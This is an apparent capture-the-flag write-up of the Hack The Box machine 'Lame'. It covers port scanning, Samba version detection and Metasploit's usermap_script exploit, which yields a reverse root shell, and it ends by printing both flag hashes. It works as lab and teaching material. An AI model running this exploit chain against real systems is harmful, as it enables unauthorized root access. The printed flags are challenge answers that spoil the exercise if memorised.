Lame Write-Up

Machine IP -

Initial Phase

Initially starting with an nmap scan -

root@kali:~/Desktop/Hack The Box/lame# nmap -F Starting Nmap 7.70 ( ) at 2019-04-11 19:17 +04 Nmap scan report for Host is up (0.37s latency). Not shown: 96 filtered ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 139/tcp open netbios-ssn 445/tcp open microsoft-ds Nmap done: 1 IP address (1 host up) scanned in 8.00 seconds

Immediately FTP seems to be an attack vector. Therefore, trying an anonymous login, we get in -

root@kali:~/Desktop/Hack The Box/lame# ftp Connected to 220 (vsFTPd 2.3.4) Name ( anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 65534 4096 Mar 17 2010 . drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .. 226 Directory send OK.

The messages here don't seem to be legit and doesn't prove worth continuing as changing the directories also doesn't work. Now we can turn to other ports. SSH seems totally out of reach; Therefore, turning to the Samba ports. We can search for scanners of samba on metasploit -

msf5> search scanner/smb Matching Modules ================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- auxiliary/scanner/smb/impacket/dcomexec 2018-03-19 normal Yes DCOM Exec auxiliary/scanner/smb/impacket/secretsdump normal Yes DCOM Exec auxiliary/scanner/smb/impacket/wmiexec 2018-03-19 normal Yes WMI Exec auxiliary/scanner/smb/pipe_auditor normal Yes SMB Session Pipe Auditor auxiliary/scanner/smb/pipe_dcerpc_auditor normal Yes SMB Session Pipe DCERPC Auditor auxiliary/scanner/smb/psexec_loggedin_users normal Yes Microsoft Windows Authenticated Logged In Users Enumeration auxiliary/scanner/smb/smb1 normal Yes SMBv1 Protocol Detection auxiliary/scanner/smb/smb2 normal Yes SMB 2.0 Protocol Detection auxiliary/scanner/smb/smb_enum_gpp normal Yes SMB Group Policy Preference Saved Passwords Enumeration auxiliary/scanner/smb/smb_enumshares normal Yes SMB Share Enumeration auxiliary/scanner/smb/smb_enumusers normal Yes SMB User Enumeration (SAM EnumUsers) auxiliary/scanner/smb/smb_enumusers_domain normal Yes SMB Domain User Enumeration auxiliary/scanner/smb/smb_login normal Yes SMB Login Check Scanner auxiliary/scanner/smb/smb_lookupsid normal Yes SMB SID User Enumeration (LookupSid) auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State auxiliary/scanner/smb/smb_version normal Yes SMB Version Detection msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_version msf5 auxiliary(scanner/smb/smb_version) > set RHOST RHOST => msf5 auxiliary(scanner/smb/smb_version) > run [*] - Host could not be identified: Unix (Samba 3.0.20-Debian) [*] - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

This gives us the version of the SMB.

Attack Phase

Now that the version of the SMB is known, we can simply google samba 3.0.20 exploit. The first thing that turns up is an exploit from metasploit itself on the website of rapid7. The path for the exploit is given, therefore this can be tried out in metasploit as follows -

msf5 auxiliary(scanner/smb/smb_version) > use exploit/multi/samba/usermap_script msf5 exploit(multi/samba/usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 139 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(multi/samba/usermap_script) > set RHOST RHOST => msf5 exploit(multi/samba/usermap_script) > exploit [*] Started reverse TCP double handler on [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo AyjQ29Pvdsjki9wn; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nAyjQ29Pvdsjki9wn\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened ( -> at 2019-04-11 19:29:29 +0400 whoami root python -c 'import pty; pty.spawn("/bin/bash");' root@lame:/# cd /home cd /home root@lame:/home# ls ls ftp makis service user root@lame:/home# cd makis cd makis root@lame:/home/makis# ls ls user.txt root@lame:/home/makis# cat user.txt cat user.txt 69454a937d94f5f0225ea00acd2e84c5 root@lame:/home/makis# cd /root cd /root root@lame:/root# ls ls Desktop root.txt vnc.log root@lame:/root# cat root.txt cat root.txt 92caac3be140ef409e45721348a4e9df

And that's how we obtain root user on the box and therefore get the root and user flags.